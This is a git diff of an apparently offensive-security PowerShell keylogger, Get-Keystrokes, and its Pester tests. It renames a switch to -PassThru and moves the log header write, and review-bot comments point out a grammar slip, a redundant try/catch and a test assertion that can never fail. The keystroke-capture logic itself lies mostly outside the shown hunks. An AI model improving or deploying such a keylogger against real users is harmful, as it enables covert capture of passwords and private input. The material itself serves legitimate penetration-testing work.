-rw-r--r--Exfiltration/Get-Keystrokes.ps119
-rw-r--r--Tests/Exfiltration.tests.ps113
2 files changed, 18 insertions, 14 deletions
diff --git a/Exfiltration/Get-Keystrokes.ps1 b/Exfiltration/Get-Keystrokes.ps1
index cc6b7a9..9e8698c 100644
--- a/Exfiltration/Get-Keystrokes.ps1
+++ b/Exfiltration/Get-Keystrokes.ps1
@@ -19,6 +19,10 @@ function Get-Keystrokes {
Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely.
+.PARAMETER PassThru
+
+ Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes.
+
.EXAMPLE
Get-Keystrokes -LogPath C:\key.log
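Review bot: The new `.PARAMETER PassThru` help text is missing a word: "so that it may manipulated" should read "so that it may be manipulated". Since the parenthetical already says the object is there to be disposed, the sentence could state that directly, e.g. `Returns the keylogger's PowerShell object so that the caller can dispose of it; primarily for testing purposes.` The comment-based help block starts above this hunk.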
@@ -36,18 +40,21 @@ function Get-Keystrokes {
[CmdletBinding()]
Param (
[Parameter(Position = 0)]
- [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent $_)) -PathType Container})]
- [String]$LogPath = "$($Env:TEMP)\key.log",
+ [ValidateScript({(Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container)})]
+ [String]$LogPath = "$($env:TEMP)\key.log",
[Parameter(Position = 1)]
[Double]$Timeout,
[Parameter()]
- [Switch]$Return
+ [Switch]$PassThru
)
$LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath)
+ try { '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode }
+ catch { throw $_ }
+
$Script = {
Param (
[Parameter(Position = 0)]
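Review bot: The `try { ... } catch { throw $_ }` wrapper around the header write only re-throws what it caught, so it adds no handling of its own and helps only if `Out-File` raises a terminating error for the failure at hand. Stating the intent on the call is shorter and does not depend on that: `'"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode -ErrorAction Stop`. The write also has no `-Append` or `-NoClobber`, so an existing file at `$LogPath` is truncated as soon as the function is called, and the file with its fixed header row exists on disk before the background script block is started. The function body continues outside the hunk.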
@@ -157,8 +164,6 @@ function Get-Keystrokes {
#endregion Imports
- '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode
-
$CallbackScript = {
Param (
[Parameter()]
@@ -368,5 +373,5 @@ function Get-Keystrokes {
# Start KeyLogger
[void]$PowerShell.BeginInvoke()
- if ($Return.IsPresent) { return $PowerShell }
-}
+ if ($PassThru.IsPresent) { return $PowerShell }
+}
\ No newline at end of file
diff --git a/Tests/Exfiltration.tests.ps1 b/Tests/Exfiltration.tests.ps1
index 30e2f53..e4f60d5 100644
--- a/Tests/Exfiltration.tests.ps1
+++ b/Tests/Exfiltration.tests.ps1
@@ -15,20 +15,19 @@ Describe 'Get-Keystrokes' {
$Shell = New-Object -ComObject wscript.shell
$Shell.AppActivate($WindowTitle)
- $KeyLogger = Get-Keystrokes -Return
+ $KeyLogger = Get-Keystrokes -PassThru
Start-Sleep -Seconds 1
- $Shell.SendKeys('Pester is SUPER l337!')
+ $Shell.SendKeys("Pester`b`b`b`b`b`b")
$KeyLogger.Dispose()
It 'Should output to file' { Test-Path "$($env:TEMP)\key.log" | Should Be $true }
$KeyObjects = Get-Content -Path "$($env:TEMP)\key.log" | ConvertFrom-Csv
- It 'Should log all keystrokes' {
- $Keys = $KeyObjects | % { $_.TypedKey }
- $String = -join $Keys
- $String | Should Be '<Shift>Pester< >is< ><Shift>S<Shift>U<Shift>P<Shift>E<Shift>R< >l337<Shift>!'
+ It 'Should log keystrokes' {
+ $FileLength = (Get-Item "$($env:TEMP)\key.log").Length
+ $FileLength | Should BeGreaterThan 14
}
It 'Should get foreground window title' {
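Review bot: The replacement assertion `$FileLength | Should BeGreaterThan 14` cannot fail once the log file exists, because the header row `"TypedKey","WindowTitle","Time"` that Get-Keystrokes writes with `-Encoding unicode` is already longer than 14 bytes on its own. As written, 'Should log keystrokes' passes even when no key is recorded. The parsed rows are already in `$KeyObjects`, so the check can count them instead: `@($KeyObjects).Count | Should BeGreaterThan 0`. The Describe block starts and ends outside the hunk.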
@@ -43,7 +42,7 @@ Describe 'Get-Keystrokes' {
It 'Should stop logging after timeout' {
$Timeout = 0.05
- $KeyLogger = Get-Keystrokes -Timeout $Timeout -Return
+ $KeyLogger = Get-Keystrokes -Timeout $Timeout -PassThru
Start-Sleep -Seconds 4